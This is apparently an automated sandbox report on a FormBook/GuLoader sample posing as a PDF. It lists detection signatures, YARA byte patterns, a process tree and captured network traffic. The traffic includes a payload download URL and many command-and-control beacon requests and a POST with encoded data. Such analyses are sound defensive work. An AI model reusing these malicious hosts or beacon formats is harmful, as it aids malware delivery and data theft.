Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BM-FM_NR.24040718PDF.exe

Overview

General Information

Sample name:BM-FM_NR.24040718PDF.exe
Analysis ID:1430949
MD5:7206084219e20fe7575aec63a3422a5c
SHA1:930508090c6ec226838189c1d6ca32035c2ac0ed
SHA256:3fb935f3b274dddf25a926967ceb573ad0f990bff966583157849545c60c42e4
Infos:

Detection

FormBook, GuLoader
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • BM-FM_NR.24040718PDF.exe (PID: 7220 cmdline: "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe" MD5: 7206084219E20FE7575AEC63A3422A5C)
    • BM-FM_NR.24040718PDF.exe (PID: 2376 cmdline: "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe" MD5: 7206084219E20FE7575AEC63A3422A5C)
      • asoFfnDVnWYESbbZcbazpTYkAQVO.exe (PID: 6428 cmdline: "C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • write.exe (PID: 3628 cmdline: "C:\Windows\SysWOW64\write.exe" MD5: 3D6FDBA2878656FA9ECB81F6ECE45703)
          • asoFfnDVnWYESbbZcbazpTYkAQVO.exe (PID: 7240 cmdline: "C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3748 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a4b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13aef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x436b6:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x2ccf5:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 10 entries
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: BM-FM_NR.24040718PDF.exeVirustotal: Detection: 12%Perma Link
        Source: Yara matchFile source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: BM-FM_NR.24040718PDF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 37.251.143.215:443 -> 192.168.11.20:50244 version: TLS 1.2
        Source: BM-FM_NR.24040718PDF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: write.pdbGCTL source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639421205.0000000006905000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: write.pdb source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639421205.0000000006905000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: wntdll.pdbUGP source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: BM-FM_NR.24040718PDF.exe, BM-FM_NR.24040718PDF.exe, 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, write.exe
        Source: Binary string: mshtml.pdbUGP source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 0_2_00406033 FindFirstFileA,FindClose,0_2_00406033
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055D1
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FDB810 FindFirstFileW,FindNextFileW,FindClose,5_2_02FDB810
        Source: C:\Windows\SysWOW64\write.exeCode function: 4x nop then xor eax, eax5_2_02FC92D0
        Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
        Source: Joe Sandbox ViewIP Address: 64.190.62.22 64.190.62.22
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /calitateX/lUMnxNJflRDqoVSbz65.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: absorbante-calitate.roCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=Rt3kyQgIVYud0ZxfjVmkNGlq6oguJ3Bu0zZO/jPZwrZwphqha226ELu53C2wC06UMZB3RXlB5IubdFV8wNllBFtqfqdEgmnsNC5NpQzeW4FZZkQ+d4TAHSc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.arilyfarlico.ruUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?Xh9lX=0rOrON9KCedqtp/KEErYODOsqb1Ol5SKTVjby8oNAnBpXQ3f6KiEeGIyIQ0Oonef/1tP4f58WruRrbReuj87L8qx+pUtt26y1FhkvVaaULxp4u5kv8q4N/k=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.donantedeovulos.spaceUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=TrWImKkXg72XbxtkItxdCHOg9XWXWDqE4iO1qHTBwn9T3tQecLtkumbZqYeYuSkxtGpQmOvVFI5PSbSpBsnHilSWnmtQ3orkxGs2pUIdqKkLQC6qurdmbFs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.kader42.topUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?Xh9lX=/YVHZOSW055QRFdzHV7EG4MPV06WciwOGAsmatOqDuiKItV6nqBs0pBRyzlLrNgNpWUhFR7Gbz8/7vzQvyrSOcbiMu9Z7oEFzfRxNbVqKIwXHjZvBpZwwR0=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.noispisok.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=IdWor3433k1T0EOhXt9dLiY9DbR+hWBcDBqvgnp+doAH8LsyGz9SvmmDD05EUVbRqIr7chpXUFkFyWAkdZSUbSWj4Fm/Hc2PGDqx2ZME3zVnMVls2zAW0u4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.kansaiwoody.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?Xh9lX=4GuIeZ5/FrknERHMXrNh6P2zNKgrxoOsX8fLf9+FvaUhJPhi6YvqajOryTNmV9FzTg+fg8zx27kOMjM9ARbv/mO9DinSc6hkOsxZ/ooW+MqGv6LVFVbELEQ=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.a-two-spa-salon.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?Xh9lX=983bcoiGgeytF04qoACGbDKY/XdXjFbfWR4mUmAai3szv0RRsFt8B5NwzCzTf8Kup64VkssKhH1SAFuTkhM3B+3j/r4OeS1gek1PDXkJF4iS0+BJcCSan5A=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.techfun.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=OmGyc5P3HC4gilwd2aY8392rI7ekMFe8/FNw83qBYcD4CWN3uhWBPhzZSt3lBo5o5sC5ats8mUsRdTFftG6L4VjYphbRhm0WEo/D3mWtey64RraPnZAfyak= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.ogunlewefamily.org.ngUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?Xh9lX=27hjRPCyRlHKx+9Yvp9X/66HqVrlT4yXNX1Fx10RnhcFdFyjtbgqtspXt/m7h19M1tNaQu/ADV6ErOuMACLC0xl2a7R1sTqGKQn1UwmaLCfsUIitr9DM5TM=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.387mfyr.sbsUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=gPmRQJtWqOniEM4QRYssNN1Z+6d7UeIsnmjN3YDy8B2ChygMtzhOiKO2U7rNAXgtrRM7pNM3lf9QxBLsAyZPQtIaU4REtcvgBDtZA8Dv/AhV5YtMj725a40= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.nurenose.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?Xh9lX=PHd15HH4KfPc0usCsZkSxG972lDJtR4Pjc4etW3YVFy3SYU2ewDgVW1TagnS2dO7KixciWH8BWdXpsVg20loSBMgq1tvcXpNFyUGPl5UEoDw0JtEo5FA5Us=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.lm2ue.usUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?Xh9lX=1MJjEON/uhpbuDEqbkHBFEkwk/hMmapOQ6TXfH8Ig3o6kyo9vDLLjAAJ58FhZwMWBw3WEeqXS0siPV8x1sARUVUsjrzf4e0UfFtBtuYJdiL+lQFlVX0tNTo=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.whjzff.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=Rt3kyQgIVYud0ZxfjVmkNGlq6oguJ3Bu0zZO/jPZwrZwphqha226ELu53C2wC06UMZB3RXlB5IubdFV8wNllBFtqfqdEgmnsNC5NpQzeW4FZZkQ+d4TAHSc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.arilyfarlico.ruUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?Xh9lX=0rOrON9KCedqtp/KEErYODOsqb1Ol5SKTVjby8oNAnBpXQ3f6KiEeGIyIQ0Oonef/1tP4f58WruRrbReuj87L8qx+pUtt26y1FhkvVaaULxp4u5kv8q4N/k=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.donantedeovulos.spaceUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=TrWImKkXg72XbxtkItxdCHOg9XWXWDqE4iO1qHTBwn9T3tQecLtkumbZqYeYuSkxtGpQmOvVFI5PSbSpBsnHilSWnmtQ3orkxGs2pUIdqKkLQC6qurdmbFs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.kader42.topUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?Xh9lX=/YVHZOSW055QRFdzHV7EG4MPV06WciwOGAsmatOqDuiKItV6nqBs0pBRyzlLrNgNpWUhFR7Gbz8/7vzQvyrSOcbiMu9Z7oEFzfRxNbVqKIwXHjZvBpZwwR0=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.noispisok.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=IdWor3433k1T0EOhXt9dLiY9DbR+hWBcDBqvgnp+doAH8LsyGz9SvmmDD05EUVbRqIr7chpXUFkFyWAkdZSUbSWj4Fm/Hc2PGDqx2ZME3zVnMVls2zAW0u4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.kansaiwoody.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?Xh9lX=4GuIeZ5/FrknERHMXrNh6P2zNKgrxoOsX8fLf9+FvaUhJPhi6YvqajOryTNmV9FzTg+fg8zx27kOMjM9ARbv/mO9DinSc6hkOsxZ/ooW+MqGv6LVFVbELEQ=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.a-two-spa-salon.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?Xh9lX=983bcoiGgeytF04qoACGbDKY/XdXjFbfWR4mUmAai3szv0RRsFt8B5NwzCzTf8Kup64VkssKhH1SAFuTkhM3B+3j/r4OeS1gek1PDXkJF4iS0+BJcCSan5A=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.techfun.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?Xh9lX=fnwN1v/cGsL5Viy/xGPo7bu3BFyPSCGRcDxJWuOrmZaTk6+QfBJJ6K85NdT8x6wg+kdjGkUCY343uxqa5Yt4yEVQtg3mZjTzeLq2Z0Ov3khzfcaVVj80n48=&ad64=U4M8cbh8kd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.concretedailypress.netUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?Xh9lX=27hjRPCyRlHKx+9Yvp9X/66HqVrlT4yXNX1Fx10RnhcFdFyjtbgqtspXt/m7h19M1tNaQu/ADV6ErOuMACLC0xl2a7R1sTqGKQn1UwmaLCfsUIitr9DM5TM=&ad64=U4M8cbh8kd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.387mfyr.sbsUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=Rt3kyQgIVYud0ZxfjVmkNGlq6oguJ3Bu0zZO/jPZwrZwphqha226ELu53C2wC06UMZB3RXlB5IubdFV8wNllBFtqfqdEgmnsNC5NpQzeW4FZZkQ+d4TAHSc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.arilyfarlico.ruUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?Xh9lX=0rOrON9KCedqtp/KEErYODOsqb1Ol5SKTVjby8oNAnBpXQ3f6KiEeGIyIQ0Oonef/1tP4f58WruRrbReuj87L8qx+pUtt26y1FhkvVaaULxp4u5kv8q4N/k=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.donantedeovulos.spaceUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=TrWImKkXg72XbxtkItxdCHOg9XWXWDqE4iO1qHTBwn9T3tQecLtkumbZqYeYuSkxtGpQmOvVFI5PSbSpBsnHilSWnmtQ3orkxGs2pUIdqKkLQC6qurdmbFs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.kader42.topUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?Xh9lX=/YVHZOSW055QRFdzHV7EG4MPV06WciwOGAsmatOqDuiKItV6nqBs0pBRyzlLrNgNpWUhFR7Gbz8/7vzQvyrSOcbiMu9Z7oEFzfRxNbVqKIwXHjZvBpZwwR0=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.noispisok.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=IdWor3433k1T0EOhXt9dLiY9DbR+hWBcDBqvgnp+doAH8LsyGz9SvmmDD05EUVbRqIr7chpXUFkFyWAkdZSUbSWj4Fm/Hc2PGDqx2ZME3zVnMVls2zAW0u4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.kansaiwoody.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?Xh9lX=4GuIeZ5/FrknERHMXrNh6P2zNKgrxoOsX8fLf9+FvaUhJPhi6YvqajOryTNmV9FzTg+fg8zx27kOMjM9ARbv/mO9DinSc6hkOsxZ/ooW+MqGv6LVFVbELEQ=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.a-two-spa-salon.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: global trafficHTTP traffic detected: GET /8cgp/?Xh9lX=983bcoiGgeytF04qoACGbDKY/XdXjFbfWR4mUmAai3szv0RRsFt8B5NwzCzTf8Kup64VkssKhH1SAFuTkhM3B+3j/r4OeS1gek1PDXkJF4iS0+BJcCSan5A=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.techfun.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
        Source: asoFfnDVnWYESbbZcbazpTYkAQVO.exe, 00000006.00000002.17956910913.0000000002522000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: .www.linkedin.comTRUE/TRUE13336872580273675bscookie"v=1&202108181112191ce8ca8a-2c8f-4463-8512-6f2d1ae6da93AQFkN2vVMNQ3mpf7d5Ecg6Jz9iVIQMh2" equals www.linkedin.com (Linkedin)
        Source: unknownDNS traffic detected: queries for: absorbante-calitate.ro
        Source: unknownHTTP traffic detected: POST /8cgp/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brCache-Control: max-age=0Content-Length: 202Connection: closeContent-Type: application/x-www-form-urlencodedHost: www.donantedeovulos.spaceOrigin: http://www.donantedeovulos.spaceReferer: http://www.donantedeovulos.space/8cgp/User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0Data Raw: 58 68 39 6c 58 3d 35 70 6d 4c 4e 34 38 67 4b 72 45 66 36 4b 54 6e 48 47 66 31 4b 78 4f 59 6a 64 77 79 70 2b 53 63 65 51 37 4a 34 34 67 4c 41 6b 52 32 42 52 61 6a 33 5a 66 42 63 56 38 43 4b 56 45 46 6d 51 43 42 38 33 52 78 2f 6f 39 39 62 37 47 75 39 72 46 61 6b 67 6f 5a 55 4d 6d 4f 32 63 49 39 36 69 7a 39 36 41 64 2f 6e 55 53 61 59 5a 51 30 6e 38 70 66 6f 4b 57 49 48 50 2b 68 4d 4d 71 75 4f 78 6d 43 66 76 64 69 33 7a 2b 33 68 6e 6a 54 76 47 45 65 63 70 6f 79 69 30 4b 2b 44 59 72 51 51 57 6e 58 6a 6e 4f 48 30 4b 79 49 32 78 59 6c 42 7a 4e 4b 57 43 30 6c 71 68 4e 71 2b 78 4f 30 4c 50 39 71 34 67 3d 3d Data Ascii: Xh9lX=5pmLN48gKrEf6KTnHGf1KxOYjdwyp+SceQ7J44gLAkR2BRaj3ZfBcV8CKVEFmQCB83Rx/o99b7Gu9rFakgoZUMmO2cI96iz96Ad/nUSaYZQ0n8pfoKWIHP+hMMquOxmCfvdi3z+3hnjTvGEecpoyi0K+DYrQQWnXjnOH0KyI2xYlBzNKWC0lqhNq+xO0LP9q4g==
